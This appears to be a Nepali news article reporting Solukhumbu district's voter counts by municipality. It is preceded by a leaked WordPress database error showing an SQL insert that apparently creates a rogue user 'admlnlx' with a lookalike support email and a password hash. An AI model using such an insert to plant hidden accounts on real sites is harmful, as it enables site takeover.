WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKi1TFtA40mxbmp0CSTyswVSQfapVI1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 06:22:48', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । सोलुखुम्बुमा मतदाताको संख्या ८१ हजार नाघेको निर्वाचन आयोगले जनाएको छ । निर्वाचन आयोगको पछील्लो तथ्यांक अनुसार सोलुखुम्बुको मतदाता संख्या ८१ हजार ५ सय २ रहेको छ । बैशाखमा सम्पन्न स्थानीय तहको निर्वाचन भन्दा आगामी मंसिर ४ गते हुने प्रतिनिधि तथा प्रदेश सभा निर्वाचनमा १ हजार ४ सय २३ जना मतदाता थपिएको निर्वाचन आयोगका प्रवक्ता शालिग्राम शर्माले जानकारी दिए । महिला मतदाता ३९ हजार ३ सय ६९ रहेको छ भने पुरुष मतदाता ४२ हजार १३३ जना रहेका छन् । २०६४ सालको निर्वाचनमा ६१ हजार ८४५ मतदाता रहेका थिए । सोलुखुम्बुमा १२२ मतदान स्थल तोकिएको छ भने १३६ मतदान केन्द्र र एक अस्थायी मतदान केन्द्र थप गरिएको छ ।
आयोगको तथ्याङक अनुसारका सबैभन्दा बढि सोलु दुधकुण्ड नगरपालिकामा मतदाता छन भने सबैभन्दा कम लिखुपिके गाउँपालिका रहेका छन । सोलु दुधकुण्ड नगरपालिकामा १९ हजार ५ सय ६३ जना रहेको छन भने लिखुपिके गाउँपालिकामा ४ हजार ९ सय ४५ जना रहेको आयोगले जनाएको छ । थुलुङ दुधकोशी गाउँपालिकामा १५ हजार १ सय १०, माप्यदुधकोशी गाउँपालिकामा १० हजार ५ सय ४२, नेचासल्यान गाउँपालिकामा १० हजार ४ सय ४३, महाकुलुङमा ७ हजार ८ सय ४९, सोताङमा ७ हजार ६४ र खुम्बु पासाङ ल्हामुमा ५ हजार ९ सय ८७ जना रहेको जिल्ला निर्वाचन कार्यालय सोलुखुम्बुले जनाएको छ ।